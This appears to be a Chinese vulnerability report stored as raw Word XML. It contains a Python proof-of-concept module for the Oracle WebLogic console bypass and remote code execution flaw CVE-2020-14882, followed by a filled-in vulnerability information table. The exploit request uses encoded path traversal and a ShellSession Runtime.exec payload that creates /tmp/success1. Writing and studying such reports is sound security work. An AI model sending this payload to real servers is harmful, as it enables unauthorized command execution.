    <w:p w14:paraId="564F6D51" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    cveID = '''CVE-2020-14882'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4021AE04" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    cnvdID = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671DB760" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    cnnvdID = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A10DB9A" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    version = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C59B34" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    author = '''</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06F13">
        <w:t>郝志成</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06F13">
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE00842" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    vulDate = '''2020-03-30'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A9BB3E" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    createDate = '''2020-03-30'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51812FAF" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    updateDate = '''2020-03-30'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640F37A5" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t xml:space="preserve">    name = '''Oracle WebLogic Server </w:t>
      </w:r>
      <w:r w:rsidRPr="00F06F13">
        <w:t>远程代码执行漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06F13">
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D6A470" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    desc = '''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636F1AF3" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>CVE-2020-14882</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06F13">
        <w:t>允许未授权的用户绕过管理控制台的权限验证访问后台，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3869DA4F" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE8D01B" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    solution = '''</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06F13">
        <w:t>安装官方最新补丁进行升级</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06F13">
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3184799F" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    severity = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423A8C1F" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    vulType = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1E666A" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    taskType = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384BD297" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    references = ['''https://mp.weixin.qq.com/s/34MWLMkMGKPuXtZnIuP_yg''']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDABBC7" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    appName = '''Oracle WebLogic Server'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1562A1BB" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    appVersion = '''10.3.6., 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E32DA6" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    appPowerLink = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5ADAF3" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:lastRenderedPageBreak/>
        <w:t>    samples = ['']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618E651B" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    install_requires = ['''''']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC9ABEE" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D58B40" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    def _attack(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604BDC28" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>        return self._verify()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5949D66D" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B40305" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    def _verify(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E48E1E" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>        self.url, ip, port = parse_ip_port(self.target, 7001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2CCA53" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>        result = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145AA4B0" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>        headers = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746CBD8D" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB0C8F8" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>             "Content-Type": "application/x-www-form-urlencoded",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1A7BD4" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020D5487" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>        path='/console/css/%252e%252e%252fconsole.portal?_nfpb=true&amp;_pageLabel=&amp;handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec(\'touch%20/tmp/success1\');")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547070B8" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>        vul_url = make_verify_url(self.url,path,mod=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A12D17" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>        resp = req.get(url=vul_url, headers = headers, verify = False, allow_redirects = False, timeout = 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4BD1ED" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C153A1" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>        if  resp.status_code == 200 :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B21BDB" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>            result['VerifyInfo'] = http_packet(resp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E38EA0" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>            result['VerifyInfo']['URL'] = vul_url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE389E3" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>            result['VerifyInfo']['port'] = port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532D834F" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>            #</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06F13">
        <w:t>在示例中，会在后台产生一个名为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06F13">
        <w:t>success1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06F13">
        <w:t>的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1413503C" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>        return self.parse_output(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F9BBCE" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EA6958A" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    def parse_output(self, result):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C3C8D1" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>        output = Output(self)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFBD32A" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>        if result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E0D8EA" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>            output.success(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EE36CA" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B8BC8C" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>            output.fail('Failed')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E26268B" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>        return output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A17A9D" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55E9A3E3" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>register(TestPOC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B3B767" w14:textId="2FC0CB65" w:rsidR="008F6264" w:rsidRPr="00F06F13" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A8FCE4D" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc25120"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="49EA1865" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>根据原始报告、漏洞报告以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>OWASP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TOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>漏洞信息描述，填写如下表格。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9229" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1417"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="1644"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="1569"/>
      </w:tblGrid>
      <w:tr w:rsidR="008F6264" w14:paraId="12F541A8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4B6ABEA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UVD-ID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E05F3" w14:textId="77777777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C67223A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漏洞类别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FAF0" w14:textId="6D190A99" w:rsidR="008F6264" w:rsidRDefault="00C2299C" w:rsidP="00C2299C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未授权远程命令执</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>行漏洞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DFAA5F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lastRenderedPageBreak/>
              <w:t>CVE-ID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7C88B" w14:textId="2FF72171" w:rsidR="008F6264" w:rsidRDefault="00C2299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7D4FC3">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>CVE-2020-14882</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="007D4FC3">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007D4FC3">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>CVE-2020-1488</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="2540D5FC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65E4969B" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05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lastRenderedPageBreak/>
              <w:t>披露</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>发现时间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2AA94" w14:textId="2A1B9BD1" w:rsidR="008F6264" w:rsidRDefault="00C2299C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020-03-30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06A352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bugtraq</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>编号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43311" w14:textId="53C32138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17E873" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05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4305" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264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10029" w14:paraId="0B2C4700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35DDCBE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提交时间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47B5" w14:textId="1820D2F2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2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>020-03-30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CDA6B2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漏洞发现者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E07F" w14:textId="0C4D3E31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641511">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Nguyen Jang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312CD9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CNVD-ID</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>：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249F6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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D10029" w14:paraId="3B76BDA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CAC7C4E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漏洞等级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983BE" w14:textId="0D196609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高危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3AFEDD6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提交者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3EE1A" w14:textId="2C6FB01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602634">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Nguyen Jang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C124099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搜索关键词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0FA9" w14:textId="0E2182D6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Weblogic server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D10029" w14:paraId="1E485C7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5579CA5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影响范围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3704" w14:textId="6956F088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Oracle WebLogic Server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，版本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10.3.6.0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12.1.3.0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12.2.1.3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12.2.1.4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，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14.1.1.0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。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D10029" w14:paraId="5EA06AC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90FE3B2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来源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12C8" w14:textId="79F5D8AB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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ra</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>cle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D10029" w14:paraId="1E2F18D0" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="412"/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4B2E4D1B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漏洞简介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F0B4" w14:textId="620EF79F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</w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E0079">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>weblogic</w:t>
            </w:r>
            <w:r w:rsidRPr="002E0079">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>未授权远程命令执行漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D10029" w14:paraId="4B199E26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FD79ADD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漏洞详情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C5B5" w14:textId="4274B065" w:rsidR="00D10029" w:rsidRDefault="00D10029" w:rsidP="00D10029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r>
              <w:rPr>
                <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:hint="eastAsia"/>
                <w:spacing w:val="8"/>
                <w:sz w:val="23"/>
